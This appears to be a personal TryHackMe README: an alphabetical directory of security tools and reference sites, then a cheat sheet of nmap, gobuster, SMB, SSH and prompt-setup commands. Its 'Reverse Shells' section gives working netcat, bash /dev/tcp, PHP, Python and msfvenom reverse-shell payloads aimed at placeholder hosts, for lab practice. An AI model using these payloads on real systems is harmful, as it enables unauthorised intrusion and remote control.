Skip to content

Latest commit

 

History

History
553 lines (447 loc) · 29.6 KB

README.md

File metadata and controls

553 lines (447 loc) · 29.6 KB

THM | TryHackMe: Tools


TryHackMe Badge - DFTF@PConsole# (DFTFPConsole)


INDEX: 0 1 2 3 4 5 6 7 8 9 A B C D E F G H I J K L M N O P Q R S T U V W X Y Z


A

  • AbuseIPDB: to help make Web safer by providing a central blacklist for webmasters, system administrators, and other interested parties to report and find IP addresses that have been associated with malicious activity online (abuseipdb.com)
  • ARIN - Search: Search ARIN Site or Whois (arin.net)
  • ASCII Table: ASCII Character Codes, HTML, Octal, Hex, Decimal (asciitable.com)
  • AttackerKB: Community-driven information, analysis, and discussion of vulnerabilities and threats (attackerkb.com)

B

  • BeEF: is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser (beefproject.com)
  • BloodHound: uses graph theory to reveal the hidden and often unintended relationships within an Active Directory or Azure environment (kali.org | github.com)
  • BuiltWith: Find out what websites are Built With (builtwith.com)
  • Burp Suite: is an integrated platform/graphical tool for performing security testing of web applications (portswigger.net)

C

  • CeWL: Custom Word List generator is a ruby app which spiders a given URL, up to a specified depth, and returns a list of words which can then be used for password crackers such as John the Ripper (kali.org | github.com)
  • Cisco Talos Intelligence Group: Search by IP, domain, or network owner for real-time threat data; File Reputation; Email & Spam Data (talosintelligence.com)
  • Command Injection Payload List: Cheat sheet/List (github.com)
  • CrackStation: Free Password Hash Cracker (crackstation.net)
  • Crt.sh: a site where you could find all the SSL or TLS certificates of the particular targeted domain (crt.sh)
  • Curl: is used in command lines or scripts to transfer data (curl.se)
  • CVE: is a list of publicly disclosed cybersecurity vulnerabilities (cve.org | cve.mitre.org)
  • CVE Details: CVE security vulnerability database (Security vulnerabilities, exploits, references) (cvedetails.com)
  • CyberChef: The Cyber Swiss Army Knife; a web app for encryption, encoding, compression and data analysis (github.io)

D

  • Devhints: a "modest" collection of cheatsheets (devhints.io)
  • DIRB: is a Web Content Scanner (kali.org | sourceforge.net)
  • Dirbuster: is a multi threaded java application designed to brute force directories and files names on web/application servers (kali.org)
  • Django: is a high-level Python web framework that encourages rapid development and clean, pragmatic design (djangoproject.com)
  • DNSdumpster: is a free domain research tool that can discover hosts related to a domain (dnsdumpster.com)
  • Dnsrecon: is a simple python script that enables to gather DNS-oriented information on a given target (kali.org | github.com)

E

  • Enum4linux: is a tool for enumerating information from Windows and Samba systems (kali.org | github.com)
  • Evil-Winrm: is the ultimate Windows Remote Management shell for hacking/pentesting (kali.org | github.com)
  • ExifTool: is a platform-independent Perl library plus a command-line application for reading, writing and editing meta information in a wide variety of files (exiftool.org)
  • Exploit Database: is a CVE compliant archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers (exploit-db.com)
  • Exploitdb: Searchable archive from The Exploit Database (kali.org | exploit-db.com)

F

  • Ffuf: is a fest web fuzzer written in Go that allows typical directory discovery, virtual host discovery (without DNS records) and GET and POST parameter fuzzing (kali.org | github.com)
  • FoxProxy: simplifies configuring browsers to access proxy-servers (getfoxyproxy.org)
  • fuzzdb/ - FuzzDB: Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery (github.com)

G

  • Gobuster: is a tool used to brute-force URIs including directories and files as well as DNS subdomains (kali.org | github.com)
  • Google Hacking Database: The GHDB is an index of search queries (we call them dorks) used to find publicly available information, intended for pentesters and security researchers (exploit-db.com)
  • GTFOBins: is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems (gtfobins.github.io)

H

  • HAITI: A CLI tool (and library) to identify hash types (hash type identifier) (noraj.github.io)
  • Hash-Identifier: Software to identify the different types of hashes used to encrypt data and especially passwords (kali.org | github.com)
  • Hashcat: supports five unique modes of attack for over 300 highly-optimized hashing algorithms (kali.org | hashcat.net)
  • Hashcat - Example hashes: a list of hashes (hashcat.net)
  • Hashes.com: is a hash lookup service. This allows you to input an hash and search for its corresponding plaintext in our database of already-cracked hashes (hashes.com)
  • HashID: is a tool written in Python 3 which supports the identification of over 220 unique hash types using regular expressions (pypi.org | github.com)
  • Hunter: Get the email addresses behind any website (hunter.io)
  • Hurl: hexadecimal & URL encoder + decoder (kali.org | github.com)
  • Hydra: is a parallelized login cracker which supports numerous protocols to attack (kali.org | github.com)

I

  • impacket/ - Impacket: is a collection of Python classes for working with network protocols (kali.org | github.com | secureauth.com)
  • Internet Archive: is a non-profit library of millions of free books, movies, software, music, websites, and more (archive.org)

J

  • John the Ripper: is a tool designed to help systems administrators to find weak (easy to guess or crack through brute force) passwords (kali.org | openwall.com)
  • JRuby/ - JRuby: is a high performance, stable, fully threaded Java implementation of the Ruby programming language (jruby.org)
  • JythonStandalone/ - Jython: The Jython project provides implementations of Python in Java, providing to Python the benefits of running on the JVM and access to classes written in Java (jython.org)

K

  • Kali Linux Metapackages: metapackages allow for easy installation of certain tools in a specific field, or alternatively, for the installation of a full Kali suite (kali.org)
  • KaliWordlists/ - Wordlists: This contains the rockyou.txt wordlist (kali.org)
  • kerbrute/ - Kerbrute: A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication (github.com)

L

  • LinEnum/ - LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks (github.com)
  • Linux man pages: documents the Linux kernel and C library interfaces that are employed by user-space programs (linux.die.net)
  • linux-smart-enumeration/ - Linux-smart-enumeration: Linux enumeration tool for pentesting and CTFs with verbosity levels (github.com)
  • LOLBAS project: The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques (lolbas-project.github.io)
  • lyricpass/ - Lyricpass: Password wordlist generator using song lyrics for targeted bruteforce audits / attacks (github.com)

M

  • MD5 Collision Demo: Collisions in the MD5 cryptographic hash function (mscs.dal.ca)
  • mentalist/ - Mentalist: is a graphical tool for custom wordlist generation (github.com)
  • Metasploit Framework: is an open source platform that supports vulnerability research, exploit development, and the creation of custom security tools (kali.org | metasploit.com)
  • Mimikatz: uses admin rights on Windows to display passwords of currently logged in users in plaintext (kali.org | blog.gentilkiwi.com)
  • MSFvenom: is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance (offensive-security.com)

N

  • National Vulnerability Database: The NVD is the U.S. government repository of standards based vulnerability management data represented using the Security Content Automation Protocol (SCAP) (nvd.nist.gov)
  • Nessus: is a remote security scanning tool, which scans a computer and raises an alert if it discovers any vulnerabilities that malicious hackers could use to gain access to any computer you have connected to a network (tenable.com)
  • NetWitness Platform: is a network security company that provides real-time network forensics automated threat detection, response, and analysis solutions (netwitness.com)
  • NetworkMiner: is a Network Forensic Analysis Tool (NFAT) for Windows (netresec.com)
  • Nikto: is a pluggable web server and CGI scanner written in Perl, using rfp’s LibWhisker to perform fast security or informational checks (kali.org | github.com)
  • Nmap: is a utility for network exploration or security auditing (kali.org | nmap.org)

O

  • OpenVPN: is a virtual private network system that implements techniques to create secure point-to-point or site-to-site connections in routed or bridged configurations and remote access facilities (openvpn.net)
  • openvpn-troubleshooting/ - TryHackMe OpenVPN Troubleshooting Script: Script to troubleshoot connectivity to the TryHackMe network using OpenVPN on Linux (github.com)
  • OWASP: The Open Web Application Security Project is a nonprofit foundation that works to improve the security of software (owasp.org)
  • OWASP favicon database: favicon database in wiki format (owasp.org)

P

  • PayloadsAllTheThings/ - Payloads All The Things, swisskyrepo: A list of useful payloads and bypass for Web Application Security and Pentest/CTF (github.com)
  • PEASS-ng/ - PEASS-ng: Privilege Escalation Awesome Scripts SUITE new generation (github.com)
  • PeopleFinder: Police Records, Background Checks, Social Media, Photos, Assets, Contact Information and Much More (peoplefinder.com)
  • Pentestmonkey: Cheat sheets, Web shells, User Enumeration, Audit, etc. (github.com | pentestmonkey.net)
  • pnwgen/ - Pnwgen: A very flexible phone number wordlist generator (github.com)
  • PowerShell: is a cross-platform (Windows, Linux, and macOS) automation and configuration tool/framework that works well with your existing tools and is optimized for dealing with structured data (e.g. JSON, CSV, XML, etc.), REST APIs, and object models (docs.microsoft.com | github.com)
  • PowerSploit/ - PowerSploit: is a series of Microsoft PowerShell scripts that can be used in post-exploitation scenarios during authorized penetration tests (kali.org | github.com)
  • Pwntools: is a CTF framework and exploit development library (docs.pwntools.com | github.com)
  • Python Package Index: PyPI is a repository of software for the Python programming language (pypi.org)
  • PythonAnywhere: makes it easy to create and run Python programs in the cloud (pythonanywhere.com)

R

  • Rawsec's CyberSecurity Inventory: An inventory of tools and resources about CyberSecurity (inventory.raw.pm)
  • RegExr: is a HTML/JS based tool for creating, testing, and learning about Regular Expressions (regexr.com)
  • RequestBin: gives you a URL that will collect requests made to it and let you inspect them in a human-friendly way (requestbin.com)
  • RexEgg: Regular Expressions Tutorial. Comprehensive resource covering basic to advanced uses of regex. Includes regex cheat sheet, tools, books and tricks (rexegg.com)
  • RsaCtfTool: RSA attack tool (mainly for ctf); retreive private key from weak public key and/or uncipher data (github.com)

S

  • Samba: is the standard Windows interoperability suite of programs for Linux and Unix. Running on a Unix system, it allows Windows to share files and printers on the Unix host, and it also allows Unix users to access resources shared by Windows systems (samba.org)
  • Scapy: is a Python program that enables the user to send, sniff and dissect and forge network packets (scapy.readthedocs.io | github.com)
  • SecLists/ - SecLists: is a collection of multiple types of lists used during security assessments (kali.org | owasp.org)
  • SHAttered: SHA-1 Collision Attacks (File tester) (shattered.io)
  • Shodan: is a search engine scanning the entirety of the internet for connected devices (shodan.io)
  • Smtp-User-Enum: Username guessing tool primarily for use against the default Solaris SMTP service. Can use either EXPN, VRFY or RCPT TO (kali.org | pentestmonkey.net)
  • Snort: is a free open source network intrusion detection system (IDS) and intrusion prevention system (IPS) (snort.org)
  • Socat: (for SOcket CAT) establishes two bidirectional byte streams and transfers data between them (kali.org)
  • static-binaries/ - Static-binaries: Various nix tools built as statically-linked binaries (github.com)
  • Sublist3r: Fast subdomains enumeration tool for penetration testers (kali.org | github.com)

T

  • Tmux: enables a number of terminals (or windows) to be accessed and controlled from a single terminal like screen (kali.org | github.com)
  • Tor Browser: prevents someone watching your connection from knowing what websites you visit (torproject.org)
  • TTPassGen: is a highly flexible and scriptable password dictionary generator base on Python, you can easily use various rules to generate the desired combination of words (github.com)
  • TunnelsUP - Hash Analyzer: Tool to identify hash types (tunnelsup.com)

U

  • User-Agent Switcher and Manager: A User-Agent spoofer browser extension that is highly configurable (github.com | add0n.com)

W

  • Wappalyzer: Find out the technology stack of any website (wappalyzer.com)
  • Web.dev - Measure: Measure page quality (web.dev)
  • Well-known Ports: table of the 1024 common ports (vmaxx.net)
  • Wfuzz: is a tool designed for bruteforcing Web Applications (kali.org | edge-security.com)
  • Who.is: Large database of whois information, DNS, domain names, name servers, IPs, and tools for searching and monitoring domain names (who.is)
  • Whois.com: The Whois database contains details such as the registration date of the domain name, when it expires, ownership and contact information, nameserver information of the domain, the registrar via which the domain was purchased, etc (whois.com)
  • Whois: provides a commandline client for the WHOIS (RFC 3912) protocol, which queries online servers for information such as contact details for domains and IP address assignments (kali.org | github.com)
  • WiGLE: Maps and database of 802.11 wireless networks, with statistics, submitted by wardrivers, netstumblers, and net huggers (wigle.net)
  • Windows Subsystem for Linux: WSL lets developers run a GNU/Linux environment - including most command-line tools, utilities, and applications - directly on Windows, unmodified, without the overhead of a traditional virtual machine or dual-boot setup (microsoft.com)
  • Wireshark: is the world's foremost and widely-used network protocol analyzer. It lets you see what's happening on your network at a microscopic level (kali.org | wireshark.org)
  • wordlistctl/ - Wordlistctl: Fetch, install and search wordlist archives from websites and torrent peers (github.com | blackarch.org)

X

  • XFreeRDP: is a Remote Desktop Protocol (RDP) implementation (kali.org | freerdp.com)
  • XSS Hunter: allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS (xsshunter.com)
  • XSS Payloads: The wonderland of JavaScript unexpected usages, and more (xss-payloads.com)

Y

  • Yandex Images: search for images online (yandex.com)

Helpful List of Bash Scripts, Commands and Inputs

Alias (~/.bash_aliases)

/TryHackMe

CdThm

/TryHackMe/Rooms

CdThmRooms

/TryHackMe/Tools

CdThmTools

/TryHackMe/VPN

CdThmVpn

Directory Brute Force

Gobuster

gobuster dir -u http://<IP>/ -w ../../Tools/KaliWordlists/dirbuster/directory-list-2.3-medium.txt -o scans/gobuster_1.txt -x .php,.html,.txt

Dirb

dirb http://<IP> -w ../../Tools/KaliWordlists/dirbuster/directory-list-2.3-medium.txt -w -X .php,.html,.txt | tee scans/dirb_1.txt

Git

Associate a file in your repository with Git LFS

git lfs track "*.<FILETYPE>"

Manipulate Files & Directories

Create a directory

mkdir scans

Change Directory

cd TryHackMe/Tools
cd TryHackMe/Rooms
cd TryHackMe/VPN

Change Mode

chmod 600 id_rsa
chmod X+ lse.sh
chmod u+s <FILE_NAME>

Move Files

mv <SOURCE_FILE> <DESTINATION_FILE>

Copy

cp <PATH/SOURCE_FILE> <PATH/DESTINATION_FILE>
cp --recursive <SOURCE_FOLDER> <DESTINATION_FOLDER>

Upload

scp <SOURCE_FILE> <USER>@<IP>:<DESTINATION_PATH>
curl --upload-file <FILE> -u '<USER>' smb://<IP>/<SHARE_NAME>/

Download

scp <USER>@<IP>:<SOURCE_FILE> <DESTINATION_PATH>
wget “http://<IP>:<PORT>/<RESOURCE>" -O <OUTPUT_NAME>

Append to end of file

echo "<TEXT>" >> <FILE>

Nmap

Quick Scan with Scripts Check

nmap -sV -sC -oN scans/nmap_1.txt <IP>

All ports

nmap -p- -sV -sC -oN scans/nmap_2.txt <IP>

Aggressive Scan

nmap -p0- -v -A -T4 -oN scans/nmap_3.txt <IP>

HTTP Script

nmap --script http-enum -v <IP> -p80 -oN scans/nmap_4.txt

DNS Script

nmap --script dns-brute -v <IP> -p80,443 -oN scans/nmap_5.txt

SMB Script

nmap --script smb-enum-users.nse -p445 <IP> -oN scans/nmap_6.txt
nmap --script smb-brute.nse -p445 <IP> -oN scans/nmap_7.txt
nmap --script smb-enum-shares -p139 <IP> -oN scans/nmap_8.txt

Vulnerability Script

nmap --script vulners,vulscan/vulscan.nse --script-args vulscandb=scipvuldb.csv -sV -p<PORTS> <IP> -oN scans/nmap_9.txt

LDAP Script

nmap -p 389 --script ldap-search <IP> -oN scans/nmap_10.txt

OpenVPN

sudo openvpn THM-DFTFPConsole-EU-Regular-1.ovpn
sudo openvpn THM-DFTFPConsole-EU-VIP-1.ovpn
sudo openvpn THM-DFTFPConsole-EU-VIP-2.ovpn

Operating System (AttackBox)

To re-synchronize the package index files from their sources

sudo apt-get update

To install the newest versions of all packages currently installed on the system

sudo apt-get upgrade

In addition to performing the function of upgrade, this option also intelligently handles changing dependencies with new versions of packages

sudo apt-get dist-upgrade

All-in-one, combine commands with &&

sudo apt-get update && sudo apt-get upgrade && sudo apt-get dist-upgrade

Kali Linux Metapackages: this package includes all of the tools you are familiar with in Kali

sudo apt install -y kali-linux-full

Interface configuration: displays information about all network interfaces currently in operation

ifconfig

Primary Prompt String (PS1)

dftfpconsole@PC-DFTF-PConsole:/mnt/c/Users/dftf$

export PS1="\[$(tput bold)\]\[\033[38;5;34m\]\u\[$(tput sgr0)\]@\[$(tput sgr0)\]\[$(tput bold)\]\[\033[38;5;34m\]\h\[$(tput sgr0)\]:\[$(tput sgr0)\]\[$(tput bold)\]\[\033[38;5;27m\]\w\[$(tput sgr0)\]\\$\[$(tput sgr0)\] \[$(tput sgr0)\]"

[12:30:01] PC-DFTF-PConsole:dftf$

export PS1="[\[$(tput sgr0)\]\[\033[38;5;226m\]\t\[$(tput sgr0)\]] \[$(tput sgr0)\]\[$(tput bold)\]\[\033[38;5;40m\]\h\[$(tput sgr0)\]:\[$(tput sgr0)\]\[$(tput bold)\]\[\033[38;5;27m\]\W\[$(tput sgr0)\]\\$\[$(tput sgr0)\] \[$(tput sgr0)\]"

[12:30:01] $

export PS1="[\[$(tput sgr0)\]\[\033[38;5;226m\]\t\[$(tput sgr0)\]] \[$(tput bold)\]\\$\[$(tput sgr0)\] \[$(tput sgr0)\]"

[12:30:01] /mnt/c/Users/dftf$

export PS1="[\[$(tput sgr0)\]\[\033[38;5;226m\]\t\[$(tput sgr0)\]] \[$(tput sgr0)\]\[$(tput bold)\]\[\033[38;5;27m\]\w\[$(tput sgr0)\]\\$\[$(tput sgr0)\] \[$(tput sgr0)\]"

/mnt/c/Users/dftf$

export PS1="\[$(tput bold)\]\[\033[38;5;27m\]\w\[$(tput sgr0)\]\\$\[$(tput sgr0)\] \[$(tput sgr0)\]"

dftf$

export PS1="\[$(tput bold)\]\[\033[38;5;27m\]\W\[$(tput sgr0)\]\\$\[$(tput sgr0)\] \[$(tput sgr0)\]"

[12:30:01] 0$

export PS1="[\[$(tput sgr0)\]\[\033[38;5;226m\]\t\[$(tput sgr0)\]] \[$(tput sgr0)\]\[$(tput bold)\]\[\033[38;5;13m\]\l\[$(tput sgr0)\]\\$\[$(tput sgr0)\] \[$(tput sgr0)\]"

[12:30:01] dftf$

export PS1="[\[$(tput sgr0)\]\[$(tput bold)\]\[\033[38;5;226m\]\t\[$(tput sgr0)\]] \[$(tput sgr0)\]\[$(tput bold)\]\[\033[38;5;27m\]\W\[$(tput sgr0)\]\\$\[$(tput sgr0)\] \[$(tput sgr0)\]"

dftfpconsole:/mnt/c/Users/dftf$

export PS1="\[$(tput bold)\]\[\033[38;5;2m\]\u\[$(tput sgr0)\]:\[$(tput sgr0)\]\[\033[38;5;27m\]\w\[$(tput sgr0)\]\\$\[$(tput sgr0)\] \[$(tput sgr0)\]"

┌──(dftfpconsole)──[/mnt/c/Users/dftf] 0
└─$

export PS1="\n\[$(tput sgr0)\]\[\033[38;5;2m\]┌──(\[$(tput sgr0)\]\[$(tput bold)\]\[\033[38;5;27m\]\u\[$(tput sgr0)\]\[\033[38;5;2m\])──[\[$(tput sgr0)\]\[$(tput bold)\]\w\[$(tput sgr0)\]\[\033[38;5;2m\]]\[$(tput sgr0)\] \[$(tput sgr0)\]\[$(tput bold)\]\[\033[38;5;13m\]\l\[$(tput sgr0)\]\n\[$(tput sgr0)\]\[\033[38;5;2m\]└─\[$(tput sgr0)\]\[$(tput bold)\]\\$\[$(tput sgr0)\] \[$(tput sgr0)\]"

Privilege Escalation Scripts

../../Tools/PEASS-ng/linpeas.sh
../../Tools/LinEnum/LinEnum.sh
../../Tools/linux-smart-enumeration/lse.sh

Reverse Shells

Listen

nc -lnvp <PORT>

Netcat

nc <IP> <PORT> -c bash

Bash

/bin/bash -i >& /dev/tcp/<IP>/<PORT> 0>&1

PHP

<?php exec(“/bin/bash -c ‘bash -i >& /dev/tcp/<IP>/<PORT> 0>&1’”); phpinfo(); ?>

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Metasploit Reverse TCP Windows

msfvenom -p  windows/meterpreter/reverse_tcp lhost=<IP> lport=<PORT> -f exe -o ./reverseshell.exe

SMB

See what shares are on the host

smbclient -L <IP>
smbmap -H <IP>

Connect

smbclient //<IP>/<SHARE_NAME>
smbclient //<IP>/<SHARE_NAME> -U <USERNAME> <PASSWORD>

SSH

ssh <USER>@<IP>
ssh -i id_rsa <USER>@<IP>

Webserver

python3 -m http.server

Wordlists

../../Tools/KaliWordlists/rockyou.txt
../../Tools/KaliWordlists/dirbuster/directory-list-2.3-small.txt
../../Tools/KaliWordlists/dirbuster/directory-list-2.3-medium.txt
../../Tools/SecLists/Discovery/Web-Content/common.txt
../../Tools/SecLists/Passwords/Common-Credentials/10k-most-common.txt

🔙 Main

Rooms are virtual classrooms dedicated to particular cyber security topics.